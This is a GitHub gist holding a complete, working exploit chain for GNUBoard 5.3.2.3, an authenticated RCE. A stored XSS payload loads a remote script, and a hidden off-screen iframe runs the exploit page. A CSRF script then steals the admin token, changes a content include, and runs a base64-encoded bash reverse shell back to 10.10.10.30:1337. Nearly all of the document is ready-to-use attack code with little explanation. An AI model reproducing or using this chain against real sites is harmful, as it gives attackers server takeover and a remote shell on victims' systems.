stypr revised this gist
Mar 7, 2020 . No changes.There are no files selected for viewing
stypr created this gist
Mar 6, 2020 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,13 @@ <!-- Stored XSS (2019.01.02) --> <form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST"> <input type='hidden' name='fg_no' value=''> <input type='hidden' name='fg_name' id='payload' value=''> </form> <script> var random = Math.round(Math.random() * 1000000000); var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin document.getElementById('payload').value = '" onfocus="$.getScript(\'' + script_url + '\')//10.10.10.60/' + random + '" autofocus value=미분류 '; document.forms[0].submit(); </script> This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,19 @@ <!-- Exploit start --> <!doctype html> <html> <head> <title>gnuboard5</title> </head> <body> <h1>GNUBoard 5.3.2.3 RCE (Authenticated)</h1> Date: 2019-01-01<br> Affected Browsers: Chrome/Firefox/Edge<br> Affected Version: 5.3 ~ 5.3.2.3<br> <!-- Hide and load exploit.html --> <iframe id="iframe" src="exploit.html" style="width:100px; height:100px; border:0; border:none; position:absolute; top: -1000px; left: -2000px;"></iframe> </body> </html> This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change 
@@ -0,0 +1,46 @@ /* CSRF -> RCE Script */ // Linux Server reverse shell -- Change it to your preferred option // base64 encoded of command ( /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.30/1337 0>&1' ) var cmd = 'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjMwLzEzMzcgMD4mMSc='; var ajax_token = ''; var co_id = 'community'; function stage3(){ // Stage3 : Execute command cmd = encodeURIComponent(cmd); var xhr = new XMLHttpRequest(); xhr.open('GET', '../../bbs/content.php?co_id=' + co_id + '&exe=echo ' + cmd + '|base64 -d|bash;%23', true); xhr.send(null); } function stage2(){ // Stage2 : upload vulnerable script post_data = 'w=&co_html=1&token=' + ajax_token + '&co_id=' + co_id + '&co_subject=커뮤니티&co_content=community&co_mobile_content=&co_skin=basic&co_mobile_skin=basic&co_tag_filter_user=0&co_include_head=../plugin/okname/hpcert1.php&co_include_tail=&captcha_key=&co_himg=&co_timg='; var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { stage3(); } } xhr.open('POST', '../contentformupdate.php', true); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr.send(post_data); } function stage1(){ // Stage1 : Get admin token var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { ajax_token = xhr.responseText.split('"token":"')[1].split('"')[0]; stage2(); } } xhr.open('GET', '../ajax.token.php', true); xhr.send(null); } // Start from stage1 stage1();